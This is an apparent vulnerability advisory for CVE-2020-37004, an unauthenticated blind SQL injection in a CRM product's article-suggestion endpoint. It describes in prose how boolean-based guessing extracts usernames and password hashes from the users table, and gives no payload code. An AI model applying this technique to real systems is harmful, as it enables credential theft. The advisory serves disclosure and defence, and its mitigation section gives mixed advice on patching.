CVE-2020-37004

Vulnerability

Description

The Ultimate Project Manager CRM PRO version 2.0.5 (and possibly earlier) contains a blind SQL injection vulnerability in the /frontend/get_article_suggestion/ endpoint. The search parameter is not properly sanitized before being used in SQL queries, allowing an attacker to inject arbitrary SQL commands [1][3]. The injection is blind (no UNION payloads), meaning results must be inferred through boolean-based responses (e.g., differences in response length) [1].

Exploitation

Details

An unauthenticated attacker can exploit this can exploit the endpoint by sending POST requests with crafted search parameters. The exploit script disclosed in OffSec's Exploit Database demonstrates how to launch character-by-character guessing against the tbl_users table. It first retrieves usernames using LIKE patterns on the username column, then uses the discovered usernames to leak their corresponding password hashes from the database [1]. The attack requires network access and no prior authentication, making it remotely exploitable with low complexity (CVSS v3 base score 8.2) [3].

Impact

Successful exploitation allows an attacker to extract all usernames and password hashes from the tbl_users table. This exposes sensitive credential data that could be leveraged to authenticate as any user, potentially leading to full system compromise, data breach, or privilege escalation, and further attacks [1][1][3].

Mitigation

The vendor homepage (ultimatepro.codexcube.com) does not indicate a patch for versions ≤2.0.5 [2]. Users should either upgrade to a patched version beyond 2.0.5 or apply WAF rules/firewall restrictions to block malicious requests containing SQLi patterns on the vulnerable endpoint. No workaround from the vendor is documented as of publication date.